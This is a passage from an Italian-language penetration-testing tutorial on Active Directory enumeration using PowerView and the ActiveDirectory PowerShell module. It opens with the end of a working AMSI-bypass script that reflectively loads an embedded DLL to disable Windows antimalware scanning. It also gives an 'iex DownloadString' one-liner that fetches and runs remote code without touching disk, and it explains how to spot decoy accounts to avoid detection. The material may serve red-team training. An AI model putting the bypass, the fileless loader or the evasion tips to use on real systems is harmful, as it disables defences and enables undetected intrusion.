1, 0, 70, 0, 105, 0, 108, 0, 101, 0, 86, 0, 101, 0, 114, 0, 115, 0, 105, 0, 111, 0, 110, 0, 0, 0, 0, 0, 49, 0, 46, 0, 48, 0, 46, 0, 48, 0, 46, 0, 48, 0, 0, 0, 62, 0, 15, 0, 1, 0, 73, 0, 110, 0, 116, 0, 101, 0, 114, 0, 110, 0, 97, 0, 108, 0, 78, 0, 97, 0, 109, 0, 101, 0, 0, 0, 66, 0, 121, 0, 112, 0, 97, 0, 115, 0, 115, 0, 65, 0, 77, 0, 83, 0, 73, 0, 46, 0, 100, 0, 108, 0, 108, 0, 0, 0, 0, 0, 72, 0, 18, 0, 1, 0, 76, 0, 101, 0, 103, 0, 97, 0, 108, 0, 67, 0, 111, 0, 112, 0, 121, 0, 114, 0, 105, 0, 103, 0, 104, 0, 116, 0, 0, 0, 67, 0, 111, 0, 112, 0, 121, 0, 114, 0, 105, 0, 103, 0, 104, 0, 116, 0, 32, 0, 169, 0, 32, 0, 32, 0, 50, 0, 48, 0, 49, 0, 56, 0, 0, 0, 42, 0, 1, 0, 1, 0, 76, 0, 101, 0, 103, 0, 97, 0, 108, 0, 84, 0, 114, 0, 97, 0, 100, 0, 101, 0, 109, 0, 97, 0, 114, 0, 107, 0, 115, 0, 0, 0, 0, 0, 0, 0, 0, 0, 70, 0, 15, 0, 1, 0, 79, 0, 114, 0, 105, 0, 103, 0, 105, 0, 110, 0, 97, 0, 108, 0, 70, 0, 105, 0, 108, 0, 101, 0, 110, 0, 97, 0, 109, 0, 101, 0, 0, 0, 66, 0, 121, 0, 112, 0, 97, 0, 115, 0, 115, 0, 65, 0, 77, 0, 83, 0, 73, 0, 46, 0, 100, 0, 108, 0, 108, 0, 0, 0, 0, 0, 54, 0, 11, 0, 1, 0, 80, 0, 114, 0, 111, 0, 100, 0, 117, 0, 99, 0, 116, 0, 78, 0, 97, 0, 109, 0, 101, 0, 0, 0, 0, 0, 66, 0, 121, 0, 112, 0, 97, 0, 115, 0, 115, 0, 65, 0, 77, 0, 83, 0, 73, 0, 0, 0, 0, 0, 52, 0, 8, 0, 1, 0, 80, 0, 114, 0, 111, 0, 100, 0, 117, 0, 99, 0, 116, 0, 86, 0, 101, 0, 114, 0, 115, 0, 105, 0, 111, 0, 110, 0, 0, 0, 49, 0, 46, 0, 48, 0, 46, 0, 48, 0, 46, 0, 48, 0, 0, 0, 56, 0, 8, 0, 1, 0, 65, 0, 115, 0, 115, 0, 101, 0, 109, 0, 98, 0, 108, 0, 121, 0, 32, 0, 86, 0, 101, 0, 114, 0, 115, 0, 105, 0, 111, 0, 110, 0, 0, 0, 49, 0, 46, 0, 48, 0, 46, 0, 48, 0, 46, 0, 48, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 12, 0, 0, 0, 200, 60, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)) | Out-Null
        Write-Output "DLL has been reflected";
    }
    [Bypass.AMSI]::Disable();
}

(Fonte: https://0x00-0x00.github.io/research/2018/11/09/Oh-No!-Amsi-blocked-the-bypass.html)

Per importare PowerView è sufficiente navigare nella cartella in cui è stato salvato e digitare:

. .\PowerView.ps1

Active Directory module è un modulo powershell che consolida un gruppo di cmdlet in grado di gestire domini, set di configurazione ADLDS (Active Directory Lightweight Directory Services) etc. Il modulo funzionerà solo se sul PC è installato il pacchetto RSAT (Remote Server Admin Tools). Nel caso di Windows 7, inoltre, è necessario eseguire il comando di importazione del modulo da una shell con privilegi elevati. Questo è quanto dice la documentazione ufficiale :) Tuttavia è possibile utilizzare il modulo senza installare RSAT e senza avere i privilegi di amministratore, bastera collegarsi al link seguente e seguire le istruzioni.

https://github.com/samratashok/ADModule

Copiate la DLL e il file psd1 sulla macchina e importate come segue:

Import-Module .\Microsoft.ActiveDirectory.Management.dll
Import-Module .\ActiveDirectory.psd1

Per essere in grado di listare tutti i cmdlets del modulo, importare anche ActiveDirectory.psd1

Il comando seguente serve per importare il modulo senza toccare il disco.

PS C:\> iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory


Ci sono dei benefici ad utilizzare il modulo Microsoft, come ad esempio ci sono meno possibilità di essere pizzicati da un AV e funziona con powershell in modalità constrained.

Per approfondire seguite questo link: https://www.labofapenetrationtester.com/2018/10/domain-enumeration-from-PowerShell-CLM.html

Enumerare dominio

PowerView
PS C:\> Get-NetDomain

ActiveDirectory module
PS C:\> Get-ADDomain 


Get-NetDomain di PowerView mostra lo stesso output di GetCurrentDomain().

Get-ADDomain di Active Directory module mostra qualcosina in più.


Oggetto di un altro dominio "trusted"

PowerView
PS C:\> Get-NetDomain -Domain nomedominio.local

ActiveDirectory module
PS C:\> Get-ADDomain -Identity nomedominio.local

SID dominio per il dominio corrente

PowerView
PS C:\> GET-DomainSID 

ActiveDirectory module
PS C:\> (Get-ADDomain).DomainSID

Policy Dominio

PowerView, mostra tutte le proprietà dell'oggetto policy
PS C:\> Get-DomainPolicy 

PowerView, per accedere alle singole proprietà dell'oggetto policy
PS C:\> (Get-DomainPolicy)."system access"

Controller Dominio

PowerView, argomento -Domain se si vuole enumerare un altro dominio
PS C:\> Get-NetDomainController 

ActiveDirectory module
PS C:\> Get-ADDomainController

Enumerare gli utenti

PowerView
PS C:\> Get-NetUser
PS C:\> Get-NetUser -Username user1

ActiveDirectory module
PS C:\> Get-ADUser -Identity user1 -Properties *
PS C:\> Get-ADUser -Filter * -Properties *

Lista di tutte le proprietà per gli utenti del dominio corrente

PowerView
PS C:\> Get-UserProperty
PS C:\> Get-UserProperty -Properties pwdlastset

ActiveDirectory module
PS C:\> Get-ADUser -Identity user1 -Properties * | select name, @ {expression={[datetime]::fromFileTime($_.pwdlastset)}}
PS C:\> Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name

Una piccola nota riguardo pwdlastset , badpwdcount e logoncount properties. Queste due proprietà relative agli utenti sono molto utili per capire quali utenti sono veri e quali fasulli, utilizzati come esca, creati appositamente per scoprire eventuali intrusioni. Pwdlastset mostra quando sono state cambiate le password degli utenti, ed è facile intuire che se le password sono state cambiate in un tempo ormai lontano, molto probabilmente si tratta di un decoy. Allo stesso modo, se il conteggio delle password sbagliate da un utente è prossimo allo 0 o il numero di logon è 0, è bene stare alla larga da quell'utente.

Cercare una stringa in una proprietà dell'utente

PowerView
PS C:\> Find-UserField -SearchField Description -SearchTerm "built"

ActiveDirectory module
PS C:\> Get-ADUser -Filter 'Description -like "*built*"' - Properties Description | select  name,Description
This article is my 2nd oldest. It is 6548 words long